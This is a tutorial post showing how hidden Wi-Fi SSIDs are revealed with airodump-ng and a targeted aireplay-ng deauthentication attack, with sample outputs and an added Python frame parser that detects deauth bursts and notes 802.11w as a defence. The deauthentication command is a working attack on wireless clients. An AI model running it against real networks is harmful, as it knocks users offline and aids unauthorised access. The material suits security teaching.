Known as security through obscurity, many people hide their SSIDs from broadcasting. Just like MAC address blocking, this is a worthless form of protection. There is nothing secure about hiding your SSID. It's like the wizard hiding behind the curtain. It does not add any value to your security, compounding complication with no reward. Today I am going to show you how easy it is to reveal a hidden SSID using the aircrack-ng suite. First things first: start airodump-ng with the following command, replacing the interface with your own.
airodump-ng wlan1
The readout should be something like this.
CH  9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
28:EF:01:34:64:91  -29       19      1    0   6  54e  WPA2  CCMP    PSK   linksys
28:EF:01:35:34:85  -42       17      0    0   6  54e  WPA2  CCMP    PSK   <length: 6>

BSSID              STATION            PWR  Rate   Lost  Packets  Probes
28:EF:01:35:34:85  28:EF:01:23:45:67  -57  0 - 1     0        1
As you can see from the devices found, we have one with a hidden SSID. A hidden SSID is shown as <length: x>, with x being the number of characters in the SSID. Some access points do not reveal this number. Honestly, the length does not matter much to us. What we are interested in is the clients attached to that access point. All we have to do is de-authenticate a client; when that client re-authenticates it will send the SSID through the air in cleartext, allowing us to retrieve it. Let's run airodump-ng again and filter out everything but the access point in question with this command.
airodump-ng -c 6 --bssid 28:EF:01:35:34:85 wlan1
The switches are:
-c = channel of the target access point
--bssid = MAC address of the target access point
This is what the airodump-ng readout should look like now.
CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
28:EF:01:35:34:85  -42       17      0    0   6  54e  WPA2  CCMP    PSK   <length: 6>

BSSID              STATION            PWR  Rate   Lost  Packets  Probes
28:EF:01:35:34:85  28:EF:01:23:45:67  -57  0 - 1     0        1
Here we can see the target access point with one client attached (the STATION column). We now need to de-authenticate this client and see if we can capture the SSID during the re-authentication.
Now open a new terminal window and leave airodump-ng running.
Run this command in the new terminal.
aireplay-ng -0 30 -a 28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1
The switches for this command are as follows:
-0 = deauthentication attack mode; 30 = number of deauth packets to send
-a = target access point MAC address
-c = target client MAC address
Now switch back to the original terminal window that still has airodump-ng running.
This is what it should now look like.
CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
28:EF:01:35:34:85  -42       17      0    0   6  54e  WPA2  CCMP    PSK   hacked

BSSID              STATION            PWR  Rate   Lost  Packets  Probes
28:EF:01:35:34:85  28:EF:01:23:45:67  -57  0 - 1     0        1  hacked
As you can see, we now know that the SSID of the target router is "hacked".
If it does not work the first time, run aireplay-ng again until it does.
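Why hiding the SSID cannot work, and what a wireless monitor would see during the steps above, as an added Python example that is not part of this post: it builds a small constructed capture (a beacon with a blanked SSID element, 30 deauthentication frames, the client's association request) and parses the raw 802.11 management frames to flag the hidden network, the deauth burst, and the SSID that travels in cleartext when the client reconnects. The frame contents and the DEAUTH_ALERT threshold are constructed and assumed values, not anything captured from a real network.

```python
"""Parse constructed 802.11 management frames: a beacon with a blanked SSID element,
the deauth burst against one client, and the cleartext SSID in its (re)association."""
import struct
from collections import Counter

AP = bytes.fromhex("28ef01353485")   # access point BSSID from the post
STA = bytes.fromhex("28ef01234567")  # client from the post
DEAUTH_ALERT = 10                    # deauths per client before a monitor alerts (assumed)

def mgmt_frame(subtype, da, sa, body):
    """Minimal management frame: FC(2) dur(2) addr1 addr2 addr3(=BSSID) seq(2) body."""
    fc = struct.pack("<H", subtype << 4)   # frame control: type 0 = management
    return fc + b"\x00\x00" + da + sa + AP + b"\x00\x00" + body

def ssid_ie(ssid):
    return bytes([0, len(ssid)]) + ssid   # information element id 0 = SSID

def parse_ssid(ies):                      # walk the IEs; SSID element body or None
    i = 0
    while i + 2 <= len(ies):
        eid, ln = ies[i], ies[i + 1]
        if eid == 0:
            return ies[i + 2:i + 2 + ln]
        i += 2 + ln
    return None

def analyse(frames):
    """Return (hidden BSSIDs, Counter of deauths per (bssid, client), recovered SSIDs)."""
    hidden, deauths, recovered = set(), Counter(), {}
    for f in frames:
        if (f[0] >> 2) & 3:              # skip control and data frames
            continue
        subtype, bssid, body = f[0] >> 4, f[16:22], f[24:]
        if subtype == 8:                 # beacon: timestamp(8) interval(2) cap(2), IEs
            s = parse_ssid(body[12:])
            if not s or s == b"\x00" * len(s):   # airodump-ng shows this as <length: N>
                hidden.add(bssid)
        elif subtype == 12:              # deauthentication; addr1 is the targeted client
            deauths[(bssid, f[4:10])] += 1
        elif subtype in (0, 2):          # (re)association request: fixed fields, then IEs
            s = parse_ssid(body[10 if subtype == 2 else 4:])
            if s:
                recovered[bssid] = s.decode(errors="replace")
    return hidden, deauths, recovered

def deauth_floods(frames):               # (bssid, client) pairs at or over the threshold
    return [k for k, n in analyse(frames)[1].items() if n >= DEAUTH_ALERT]

# Constructed capture reproducing the post: hidden beacon, 30 deauths, client reconnect.
CAPTURE = [mgmt_frame(8, b"\xff" * 6, AP, b"\x00" * 12 + ssid_ie(b"\x00" * 6))]
CAPTURE += [mgmt_frame(12, STA, AP, b"\x07\x00")] * 30     # what aireplay-ng -0 30 sends
CAPTURE.append(mgmt_frame(0, AP, STA, b"\x00" * 4 + ssid_ie(b"hacked")))
```

The deauth burst is the only part of this a defender can block (802.11w management frame protection makes the access point and client ignore forged deauthentication frames); the SSID element in probe and association requests is never encrypted, so hiding it gains nothing either way.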